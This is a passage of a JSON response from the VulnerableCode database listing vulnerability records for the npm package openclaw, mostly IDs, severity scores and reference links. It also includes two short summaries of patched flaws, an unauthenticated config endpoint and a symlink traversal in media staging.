-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerabili
ty":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerabili
ty":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-32035","GHSA-wpg9-4g4v-f9rc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dzmz-c5en-5qeq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/93521?format=json","vulnerability_id":"VCID-e25p-j5ed-yqfz","summary":"OpenClaw's Gateway Control UI bootstrap config required Gateway auth\n## Summary\nThe Gateway Control UI bootstrap config endpoint did not require Gateway auth.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nWhen Gateway authentication was enabled, the Control UI bootstrap 
config endpoint could still be read without a valid Gateway token. That response could expose sensitive bootstrap/config fields intended only for authenticated Control UI sessions.\n\n## Fix\nThe bootstrap config route now goes through the same Gateway read-auth path as other authenticated Control UI reads. Regression tests cover unauthenticated rejection, valid-token access, and basePath handling.\n\n## Fix Commit(s)\n- 2321d67263bc710e357644d59f746b08d891051b\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @zsxsoft for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2321d67263bc710e357644d59f746b08d891051b","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/2321d67263bc710e357644d59f746b08d891051b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-93rg-2xm5-2p9v","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"
https://github.com/openclaw/openclaw/security/advisories/GHSA-93rg-2xm5-2p9v"},{"reference_url":"https://github.com/advisories/GHSA-93rg-2xm5-2p9v","reference_id":"GHSA-93rg-2xm5-2p9v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-93rg-2xm5-2p9v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114466?format=json","purl":"pkg:npm/openclaw@2026.4.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-ye4t-n6r3-67ab"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"}],"aliases":["GHSA-93rg-2xm5-2p9v"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e25p-j5ed-yqfz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50636?format=json","vulnerability_id":"VCID-e31s-2etq-6fdq","summary":"OpenClaw: stageSandboxMedia destination symlink traversal can overwrite files outside sandbox workspace\n`stageSandboxMedia` allowed destination symlink traversal during media staging, which could overwrite files outside the sandbox workspace 
root.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31990","reference_id":"","reference_type":"","scores":[{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11821","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11856","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11862","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31990"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/17ede52a4be3034f6ec4b883ac6b81ad0101558a","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-19T17:02:57Z/"}],"url":"https://github.com/openclaw/openclaw/commit/17ede52a4be3034f6ec4b883ac6b81ad0101558a"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-stagesandboxmedia-destination","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"6.9","scoring_system
":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-19T17:02:57Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-symlink-traversal-in-stagesandboxmedia-destination"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31990","reference_id":"CVE-2026-31990","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31990"},{"reference_url":"https://github.com/advisories/GHSA-cfvj-7rx7-fc7c","reference_id":"GHSA-cfvj-7rx7-fc7c","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cfvj-7rx7-fc7c"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cfvj-7rx7-fc7c","reference_id":"GHSA-cfvj-7rx7-fc7c","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-19T17:02:57Z/"}],"url":"https://github.com/ope
nclaw/openclaw/security/advisories/GHSA-cfvj-7rx7-fc7c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vu
lnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vu
lnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vu
lnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vu
lnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vu
lnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},